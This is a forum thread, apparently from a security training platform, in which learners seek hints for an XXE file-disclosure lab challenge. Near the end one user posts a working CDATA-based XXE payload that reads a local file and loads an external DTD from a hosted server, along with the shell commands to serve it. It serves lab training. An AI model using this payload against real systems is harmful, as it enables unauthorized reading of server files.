Web Attacks - Advanced File Disclosure

Please could someone give me a tip to help complete the challenge at the end of the Advanced File Disclosure Section

I’ve tried both methods to try and find flag.php. When I use either method I can get the other PHP pages to show up fine, I can view system files, but for some reason I can’t find the flag. This makes me believe it might be contained in a subdirectory that I don’t know the name of. I’ve already tried fuzzing for different directories but this still isn’t helping.

Any help would be appreciated.

hi @Theonly_wilko
…am not even able to view the system files in the response…
in my local DTD file, i kept it as echo ‘’ > xxe.dtd
also ,in my request I append the piece of code given in the module by changing the IP AND PORT alone…
Can you tell me whether I should append anything in the local DTD file as the hint says-Don’t forget to point the ‘file’ to the flag in your local DTD file.

1 Like

hey guys!!! I ve finally solved it!!! DM if u need any help

1 Like

Sorry I didn’t see this. I’m glad you got it in the end!

hi bhatty, how you doing? Could you please drop a hint on this? thanks in advance!

Hello,

i do not understand why it is not working like in the course. even the first thing is not working

EDIT : I FOUND THE ERROR .
There was the need to change the content too and not keep the original content

1 Like

Hello Everyone, I am also stuck at this point

Can anyone help please ??

Thank You

-justincase

So, for all struggling here. Here is what you might want to do

Basic

  1. Make sure you include the reference entity in the <email> * </email> tags. For instance: <email>company;</email>
  2. You don’t forget about ; after the reference entity

Advanced – CDATA

  1. Set a payload on your machine:
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000

  1. Exploit: Add this on top of the POST request in Burp Suite:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> 
  <!ENTITY % file SYSTEM "file:///flag.php"> 
  <!ENTITY % end "]]>"> 
  <!ENTITY % xxe SYSTEM "http://10.10.15.214:8000/xxe.dtd">
  %xxe;
]>
...........
<email>&joined;</email>
...........

As you can tell, no secrets told. Everything is being given in the module and is directly taken from it. Tho, the error based XXE doesn’t seem to work for me at all